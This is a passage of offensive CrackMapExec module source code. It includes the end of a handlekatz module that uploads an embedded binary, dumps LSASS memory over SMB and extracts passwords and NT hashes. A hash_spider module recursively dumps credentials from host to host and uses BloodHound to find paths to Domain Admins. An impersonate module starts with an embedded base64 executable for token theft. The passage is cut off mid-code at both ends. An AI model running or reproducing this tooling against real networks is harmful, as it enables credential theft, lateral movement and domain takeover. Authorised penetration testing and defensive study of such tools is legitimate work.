AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEARQAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQQAAAAAAAkBlAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4BlAAAAAAACwGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
)
self.handlekatz = "handlekatz.exe"
self.handlekatz_path = "/tmp/"
self.dir_result = self.handlekatz_path
self.useembeded = True
if "HANDLEKATZ_PATH" in module_options:
self.handlekatz_path = module_options["HANDLEKATZ_PATH"]
self.useembeded = False
if "HANDLEKATZ_EXE_NAME" in module_options:
self.handlekatz = module_options["HANDLEKATZ_EXE_NAME"]
if "TMP_DIR" in module_options:
self.tmp_dir = module_options["TMP_DIR"]
if "DIR_RESULT" in module_options:
self.dir_result = module_options["DIR_RESULT"]
def on_admin_login(self, context, connection):
if self.useembeded:
with open(self.handlekatz_path + self.handlekatz, "wb") as handlekatz:
handlekatz.write(self.handlekatz_embeded)
context.log.display(f"Copy {self.handlekatz_path + self.handlekatz} to {self.tmp_dir}")
with open(self.handlekatz_path + self.handlekatz, "rb") as handlekatz:
try:
connection.conn.putFile(self.share, self.tmp_share + self.handlekatz, handlekatz.read)
context.log.success(f"[OPSEC] Created file {self.handlekatz} on the \\\\{self.share}{self.tmp_share}")
except Exception as e:
context.log.fail(f"Error writing file to share {self.share}: {e}")
# get LSASS PID via `tasklist`
command = 'tasklist /v /fo csv | findstr /i "lsass"'
context.log.display(f"Getting lsass PID via command {command}")
p = connection.execute(command, True)
context.log.debug(f"Command Result: {p}")
if len(p) == 1:
p = p[0]
if not p or p == "None":
context.log.fail(f"Failed to execute command to get LSASS PID")
return
# we get a CSV string back from `tasklist`, so we grab the PID from it
pid = p.split(",")[1][1:-1]
context.log.debug(f"pid: {pid}")
command = self.tmp_dir + self.handlekatz + " --pid:" + pid + " --outfile:" + self.tmp_dir + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log"
context.log.display(f"Executing command {command}")
p = connection.execute(command, True)
context.log.debug(f"Command result: {p}")
if "Lsass dump is complete" in p:
context.log.success("Process lsass.exe was successfully dumped")
dump = True
else:
context.log.fail("Process lsass.exe error un dump, try with verbose")
dump = False
if dump:
regex = r"([A-Za-z0-9-]*\.log)"
matches = re.search(regex, str(p), re.MULTILINE)
if not matches:
context.log.display("Error getting the lsass.dmp file name")
sys.exit(1)
machine_name = matches.group()
context.log.display(f"Copy {machine_name} to host")
with open(self.dir_result + machine_name, "wb+") as dump_file:
try:
connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)
context.log.success(f"Dumpfile of lsass.exe was transferred to {self.dir_result + machine_name}")
except Exception as e:
context.log.fail(f"Error while get file: {e}")
try:
connection.conn.deleteFile(self.share, self.tmp_share + self.handlekatz)
context.log.success(f"Deleted handlekatz file on the {self.share} share")
except Exception as e:
context.log.fail(f"[OPSEC] Error deleting handlekatz file on share {self.share}: {e}")
try:
connection.conn.deleteFile(self.share, self.tmp_share + machine_name)
context.log.success(f"Deleted lsass.dmp file on the {self.share} share")
except Exception as e:
context.log.fail(f"[OPSEC] Error deleting lsass.dmp file on share {self.share}: {e}")
h_in = open(self.dir_result + machine_name, "rb")
h_out = open(self.dir_result + machine_name + ".decode", "wb")
bytes_in = bytearray(h_in.read())
bytes_in_len = len(bytes_in)
context.log.display(f"Deobfuscating, this might take a while (size: {bytes_in_len} bytes)")
chunks = [bytes_in[i : i + 1000000] for i in range(0, bytes_in_len, 1000000)]
for chunk in chunks:
for i in range(0, len(chunk)):
chunk[i] ^= 0x41
h_out.write(bytes(chunk))
with open(self.dir_result + machine_name + ".decode", "rb") as dump:
try:
credz_bh = []
try:
pypy_parse = pypykatz.parse_minidump_external(dump)
except Exception as e:
pypy_parse = None
context.log.fail(f"Error parsing minidump: {e}")
ssps = [
"msv_creds",
"wdigest_creds",
"ssp_creds",
"livessp_creds",
"kerberos_creds",
"credman_creds",
"tspkg_creds",
]
for luid in pypy_parse.logon_sessions:
for ssp in ssps:
for cred in getattr(pypy_parse.logon_sessions[luid], ssp, []):
domain = getattr(cred, "domainname", None)
username = getattr(cred, "username", None)
password = getattr(cred, "password", None)
NThash = getattr(cred, "NThash", None)
if NThash is not None:
NThash = NThash.hex()
if username and (password or NThash) and "$" not in username:
print_pass = password if password else NThash
context.log.highlight(domain + "\\" + username + ":" + print_pass)
if "." not in domain and domain.upper() in connection.domain.upper():
domain = connection.domain
credz_bh.append(
{
"username": username.upper(),
"domain": domain.upper(),
}
)
if len(credz_bh) > 0:
add_user_bh(credz_bh, None, context.log, connection.config)
except Exception as e:
context.log.fail("Error opening dump file", str(e))
================================================
FILE: cme/modules/hash_spider.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Peter Gormington (@hackerm00n on Twitter)
import logging
from sqlite3 import connect
from sys import exit
from neo4j import GraphDatabase, basic_auth
from neo4j.exceptions import AuthError, ServiceUnavailable
from lsassy.dumper import Dumper
from lsassy.parser import Parser
from lsassy.session import Session
from lsassy.impacketfile import ImpacketFile
credentials_data = []
admin_results = []
found_users = []
reported_da = []
def neo4j_conn(context, connection, driver):
if connection.config.get("BloodHound", "bh_enabled") != "False":
context.log.display("Connecting to Neo4j/Bloodhound.")
try:
session = driver.session()
list(session.run("MATCH (g:Group) return g LIMIT 1"))
context.log.display("Connection Successful!")
except AuthError as e:
context.log.fail("Invalid credentials")
except ServiceUnavailable as e:
context.log.fail("Could not connect to neo4j database")
except Exception as e:
context.log.fail("Error querying domain admins")
context.log.debug(e)
else:
context.log.fail("BloodHound not marked enabled. Check cme.conf")
exit(1)
def neo4j_local_admins(context, driver):
global admin_results
try:
session = driver.session()
admins = session.run("MATCH (c:Computer) OPTIONAL MATCH (u1:User)-[:AdminTo]->(c) OPTIONAL MATCH (u2:User)-[:MemberOf*1..]->(:Group)-[:AdminTo]->(c) WITH COLLECT(u1) + COLLECT(u2) AS TempVar,c UNWIND TempVar AS Admins RETURN c.name AS COMPUTER, COUNT(DISTINCT(Admins)) AS ADMIN_COUNT,COLLECT(DISTINCT(Admins.name)) AS USERS ORDER BY ADMIN_COUNT DESC") # This query pulls all PCs and their local admins from Bloodhound. Based on: https://github.com/xenoscr/Useful-BloodHound-Queries/blob/master/List-Queries.md and other similar posts
context.log.success("Admins and PCs obtained.")
except Exception:
context.log.fail("Could not pull admins")
exit()
admin_results = [record for record in admins.data()]
def create_db(local_admins, dbconnection, cursor):
cursor.execute("""CREATE TABLE if not exists pc_and_admins ("pc_name" TEXT UNIQUE, "local_admins" TEXT, "dumped" TEXT)""")
for result in local_admins:
cursor.execute(
"INSERT OR IGNORE INTO pc_and_admins(pc_name, local_admins, dumped) VALUES(?, ?, ?)",
(
result.get("COMPUTER"),
str(
result.get("USERS"),
),
"FALSE",
),
)
dbconnection.commit()
cursor.execute("""CREATE TABLE if not exists admin_users("username" TEXT UNIQUE, "hash" TEXT, "password" TEXT)""")
admin_users = []
for result in local_admins:
for user in result.get("USERS"):
if user not in admin_users:
admin_users.append(user)
for user in admin_users:
cursor.execute("""INSERT OR IGNORE INTO admin_users(username) VALUES(?)""", [user])
dbconnection.commit()
def process_creds(context, connection, credentials_data, dbconnection, cursor, driver):
if connection.args.local_auth:
context.log.extra["host"] = connection.conn.getServerDNSDomainName()
else:
context.log.extra["host"] = connection.domain
context.log.extra["hostname"] = connection.host.upper()
for result in credentials_data:
username = result["username"].upper().split("@")[0]
nthash = result["nthash"]
password = result["password"]
if result["password"] is not None:
context.log.highlight(f"Found a cleartext password for: {username}:{password}. Adding to the DB and marking user as owned in BH.")
cursor.execute(
"UPDATE admin_users SET password = ? WHERE username LIKE '" + username + "%'",
[password],
)
username = f"{username.upper()}@{context.log.extra['host'].upper()}"
dbconnection.commit()
session = driver.session()
session.run('MATCH (u) WHERE (u.name = "' + username + '") SET u.owned=True RETURN u,u.name,u.owned')
if nthash == "aad3b435b51404eeaad3b435b51404ee" or nthash == "31d6cfe0d16ae931b73c59d7e0c089c0":
context.log.fail(f"Hash for {username} is expired.")
elif username not in found_users and nthash is not None:
context.log.highlight(f"Found hashes for: '{username}:{nthash}'. Adding them to the DB and marking user as owned in BH.")
found_users.append(username)
cursor.execute(
"UPDATE admin_users SET hash = ? WHERE username LIKE '" + username + "%'",
[nthash],
)
dbconnection.commit()
username = f"{username.upper()}@{context.log.extra['host'].upper()}"
session = driver.session()
session.run('MATCH (u) WHERE (u.name = "' + username + '") SET u.owned=True RETURN u,u.name,u.owned')
path_to_da = session.run("MATCH p=shortestPath((n)-[*1..]->(m)) WHERE n.owned=true AND m.name=~ '.*DOMAIN ADMINS.*' RETURN p")
paths = [record for record in path_to_da.data()]
for path in paths:
if path:
for key, value in path.items():
for item in value:
if type(item) == dict:
if {item["name"]} not in reported_da:
context.log.success(f"You have a valid path to DA as {item['name']}.")
reported_da.append({item["name"]})
exit()
def initial_run(connection, cursor):
username = connection.username
password = getattr(connection, "password", "")
nthash = getattr(connection, "nthash", "")
cursor.execute(
"UPDATE admin_users SET password = ? WHERE username LIKE '" + username + "%'",
[password],
)
cursor.execute(
"UPDATE admin_users SET hash = ? WHERE username LIKE '" + username + "%'",
[nthash],
)
class CMEModule:
name = "hash_spider"
description = "Dump lsass recursively from a given hash using BH to find local admins"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
self.reset = None
self.reset_dumped = None
self.method = None
@staticmethod
def save_credentials(context, connection, domain, username, password, lmhash, nthash):
host_id = context.db.get_computers(connection.host)[0][0]
if password is not None:
credential_type = 'plaintext'
else:
credential_type = 'hash'
password = ':'.join(h for h in [lmhash, nthash] if h is not None)
context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id)
def options(self, context, module_options):
"""
METHOD Method to use to dump lsass.exe with lsassy
RESET_DUMPED Allows re-dumping of hosts. (Default: False)
RESET Reset DB. (Default: False)
"""
self.method = "comsvcs"
if "METHOD" in module_options:
self.method = module_options["METHOD"]
self.reset_dumped = module_options.get("RESET_DUMPED", False)
self.reset = module_options.get("RESET", False)
def run_lsassy(self, context, connection, cursor): # copied and pasted from lsassy_dumper & added cursor
# lsassy uses a custom "success" level, which requires initializing its logger or an error will be thrown
# lsassy also removes all other handlers and overwrites the formatter which is bad (we want ours)
# so what we do is define "success" as a logging level, then do nothing with the output
logging.addLevelName(25, "SUCCESS")
setattr(logging, "success", lambda message, *args: ())
host = connection.host
domain_name = connection.domain
username = connection.username
password = getattr(connection, "password", "")
lmhash = getattr(connection, "lmhash", "")
nthash = getattr(connection, "nthash", "")
session = Session()
session.get_session(
address=host,
target_ip=host,
port=445,
lmhash=lmhash,
nthash=nthash,
username=username,
password=password,
domain=domain_name,
)
if session.smb_session is None:
context.log.fail("Couldn't connect to remote host. Password likely expired/changed. Removing from DB.")
cursor.execute(f"UPDATE admin_users SET hash = NULL WHERE username LIKE '{username}'")
return False
dumper = Dumper(session, timeout=10, time_between_commands=7).load(self.method)
if dumper is None:
context.log.fail("Unable to load dump method '{}'".format(self.method))
return False
file = dumper.dump()
if file is None:
context.log.fail("Unable to dump lsass")
return False
credentials, tickets, masterkeys = Parser(file).parse()
file.close()
ImpacketFile.delete(session, file.get_file_path())
if credentials is None:
credentials = []
credentials = [cred.get_object() for cred in credentials if not cred.get_username().endswith("$")]
credentials_unique = []
credentials_output = []
for cred in credentials:
if [
cred["domain"],
cred["username"],
cred["password"],
cred["lmhash"],
cred["nthash"],
] not in credentials_unique:
credentials_unique.append(
[
cred["domain"],
cred["username"],
cred["password"],
cred["lmhash"],
cred["nthash"],
]
)
credentials_output.append(cred)
self.save_credentials(context, connection, cred["domain"], cred["username"], cred["password"], cred["lmhash"], cred["nthash"])
global credentials_data
credentials_data = credentials_output
def spider_pcs(self, context, connection, cursor, dbconnection, driver):
cursor.execute("SELECT * from admin_users WHERE hash is not NULL")
compromised_users = cursor.fetchall()
cursor.execute("SELECT pc_name,local_admins FROM pc_and_admins WHERE dumped LIKE 'FALSE'")
admin_access = cursor.fetchall()
for user in compromised_users:
for pc in admin_access:
if user[0] in pc[1]:
cursor.execute(f"SELECT * FROM pc_and_admins WHERE pc_name = '{pc[0]}' AND dumped NOT LIKE 'TRUE'")
more_to_dump = cursor.fetchall()
if len(more_to_dump) > 0:
context.log.display(f"User {user[0]} has more access to {pc[0]}. Attempting to dump.")
connection.domain = user[0].split("@")[1]
setattr(connection, "host", pc[0].split(".")[0])
setattr(connection, "username", user[0].split("@")[0])
setattr(connection, "nthash", user[1])
setattr(connection, "nthash", user[1])
try:
self.run_lsassy(context, connection, cursor)
cursor.execute("UPDATE pc_and_admins SET dumped = 'TRUE' WHERE pc_name LIKE '" + pc[0] + "%'")
process_creds(
context,
connection,
credentials_data,
dbconnection,
cursor,
driver,
)
self.spider_pcs(context, connection, cursor, dbconnection, driver)
except Exception:
context.log.fail(f"Failed to dump lsassy on {pc[0]}")
if len(admin_access) > 0:
context.log.fail("No more local admin access known. Please try re-running Bloodhound with newly found accounts.")
exit()
def on_admin_login(self, context, connection):
db_path = connection.config.get("CME", "workspace")
# DB will be saved at ./CrackMapExec/hash_spider_default.sqlite3 if workspace in cme.conf is "default"
db_name = f"hash_spider_{db_path}.sqlite3"
dbconnection = connect(db_name, check_same_thread=False, isolation_level=None)
cursor = dbconnection.cursor()
if self.reset:
try:
cursor.execute("DROP TABLE IF EXISTS admin_users;")
cursor.execute("DROP TABLE IF EXISTS pc_and_admins;")
context.log.display("Database reset")
exit()
except Exception as e:
context.log.fail("Database reset error", str(e))
exit()
if self.reset_dumped:
try:
cursor.execute("UPDATE pc_and_admins SET dumped = 'False'")
context.log.display("PCs can be dumped again.")
except Exception as e:
context.log.fail("Database update error", str(e))
exit()
neo4j_user = connection.config.get("BloodHound", "bh_user")
neo4j_pass = connection.config.get("BloodHound", "bh_pass")
neo4j_uri = connection.config.get("BloodHound", "bh_uri")
neo4j_port = connection.config.get("BloodHound", "bh_port")
neo4j_db = f"bolt://{neo4j_uri}:{neo4j_port}"
driver = GraphDatabase.driver(neo4j_db, auth=basic_auth(neo4j_user, neo4j_pass), encrypted=False)
neo4j_conn(context, connection, driver)
neo4j_local_admins(context, driver)
create_db(admin_results, dbconnection, cursor)
initial_run(connection, cursor)
context.log.display("Running lsassy")
self.run_lsassy(context, connection, cursor)
process_creds(context, connection, credentials_data, dbconnection, cursor, driver)
context.log.display("🕷️ Starting to spider 🕷️")
self.spider_pcs(context, connection, cursor, dbconnection, driver)
================================================
FILE: cme/modules/impersonate.py
================================================
# Impersonate module for CME
# Author of the module : https://twitter.com/Defte_
# Impersonate: https://github.com/sensepost/Impersonate
# Token manipulation blog post https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/
from base64 import b64decode
from sys import exit
from os import path
class CMEModule:
name = "impersonate"
description = "List and impersonate tokens to run command as locally logged on users"
supported_protocols = ["smb"]
opsec_safe = True # could be flagged
multiple_hosts = True
def options(self, context, module_options):
'''
TOKEN // Token id to usurp
EXEC // Command to exec
IMP_EXE // Path to the Impersonate binary on your local computer
'''
self.tmp_dir = "C:\\Windows\\Temp\\"
self.share = "C$"
self.tmp_share = self.tmp_dir.split(":")[1]
self.impersonate = "Impersonate.exe"
self.useembeded = True
self.token = self.cmd = ""
self.impersonate_embedded = b64decode("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